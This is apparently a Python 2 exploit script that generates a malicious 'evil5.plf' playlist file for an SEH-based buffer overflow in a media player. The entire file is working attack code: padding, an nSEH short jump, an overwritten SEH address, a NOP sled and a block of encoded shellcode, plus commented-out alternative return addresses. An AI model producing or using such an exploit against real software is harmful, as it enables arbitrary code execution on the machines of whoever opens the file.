#!/usr/bin/python -w

filename = "evil5.plf"

shellcode = ("\xda\xc7\xbb\x2e\x9f\x17\xd3\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
"\x4f\x31\x5f\x19\x03\x5f\x19\x83\xef\xfc\xcc\x6a\xeb\x3b\x99"
"\x95\x14\xbc\xf9\x1c\xf1\x8d\x2b\x7a\x71\xbf\xfb\x08\xd7\x4c"
"\x70\x5c\xcc\xc7\xf4\x49\xe3\x60\xb2\xaf\xca\x71\x73\x70\x80"
"\xb2\x12\x0c\xdb\xe6\xf4\x2d\x14\xfb\xf5\x6a\x49\xf4\xa7\x23"
"\x05\xa7\x57\x47\x5b\x74\x56\x87\xd7\xc4\x20\xa2\x28\xb0\x9a"
"\xad\x78\x69\x91\xe6\x60\x01\xfd\xd6\x91\xc6\x1e\x2a\xdb\x63"
"\xd4\xd8\xda\xa5\x25\x20\xed\x89\xe9\x1f\xc1\x07\xf0\x58\xe6"
"\xf7\x87\x92\x14\x85\x9f\x60\x66\x51\x2a\x75\xc0\x12\x8c\x5d"
"\xf0\xf7\x4a\x15\xfe\xbc\x19\x71\xe3\x43\xce\x09\x1f\xcf\xf1"
"\xdd\xa9\x8b\xd5\xf9\xf2\x48\x74\x5b\x5f\x3e\x89\xbb\x07\x9f"
"\x2f\xb7\xaa\xf4\x49\x9a\xa2\x39\x67\x25\x33\x56\xf0\x56\x01"
"\xf9\xaa\xf0\x29\x72\x74\x06\x4d\xa9\xc0\x98\xb0\x52\x30\xb0"
"\x76\x06\x60\xaa\x5f\x27\xeb\x2a\x5f\xf2\xbb\x7a\xcf\xad\x7b"
"\x2b\xaf\x1d\x13\x21\x20\x41\x03\x4a\xea\xf4\x04\xdd\xd5\xaf"
"\x88\x93\xbe\xad\x8c\xaa\x85\x3b\x6a\xc6\xe9\x6d\x25\x7f\x93"
"\x37\xbd\x1e\x5c\xe2\x55\x82\xcf\x69\xa5\xcd\xf3\x25\xf2\x9a"
"\xc2\x3f\x96\x36\x7c\x96\x84\xca\x18\xd1\x0c\x11\xd9\xdc\x8d"
"\xd4\x65\xfb\x9d\x20\x65\x47\xc9\xfc\x30\x11\xa7\xba\xea\xd3"
"\x11\x15\x40\xba\xf5\xe0\xaa\x7d\x83\xec\xe6\x0b\x6b\x5c\x5f"
"\x4a\x94\x51\x37\x5a\xed\x8f\xa7\xa5\x24\x14\xd7\xef\x64\x3d"
"\x70\xb6\xfd\x7f\x1d\x49\x28\x43\x18\xca\xd8\x3c\xdf\xd2\xa9"
"\x39\x9b\x54\x42\x30\xb4\x30\x64\xe7\xb5\x10")

evil = "\x90"*20 + shellcode

#buffer = "A"*608 + [nSEH - EB 06] + [SEH - 0x61617619] + "D"*1384
#buffer = "A"*608 + [nSEH - EB 06] + [SEH - 0x61603173] + "D"*1384
#buffer = "\x41"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "\x42" * (1384-len(evil))
buffer = "\x41"*608 + "\xEB\x06\x90\x90" + "\x73\x31\x60\x61" + evil + "\x42" * (1384-len(evil))

print len(buffer)
textfile = open(filename, 'w')
textfile.write(buffer)
textfile.close()

